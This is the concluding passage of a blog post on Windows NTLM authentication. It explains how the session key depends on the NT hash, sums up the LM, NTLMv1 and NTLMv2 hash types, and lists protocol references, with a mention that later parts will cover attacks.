And that's the session key. You'll notice that generating that key requires knowing the NT hash in both cases, whether NTLMv1 or NTLMv2, and the only sides owning that key are the client and the server. A MITM doesn't own it and so can't manipulate the message. This isn't always the case, for sure; the mechanism has its own prerequisites and therefore its own drawbacks, which will be discussed in the next parts, where we're going to dig deeper into the internals of the authentication/integrity process in order to gain more knowledge of how these features are abused.

Conclusion and references

We've discussed the difference between LM, NTHash, NTLMv1, and NTLMv2 hashes. I went through the NTLM authentication process and gave a quick brief on NTLMSSP's main functions. In the next parts, we will dig deeper into how NTLMSSP works and how we can abuse the NTLM authentication mechanism. If you believe there is any mistake or update that needs to be added, feel free to contact me on Twitter.

References

The NTLM Authentication Protocol and Security Support Provider
Mechanics of User Identification and Authentication: Fundamentals of Identity Management
[MS-NLMP]: NT LAN Manager (NTLM) Authentication Protocol
LM, NTLM, Net-NTLMv2, oh my!

Sursa: https://blog.redforce.io/windows-authentication-and-attacks-part-1-ntlm/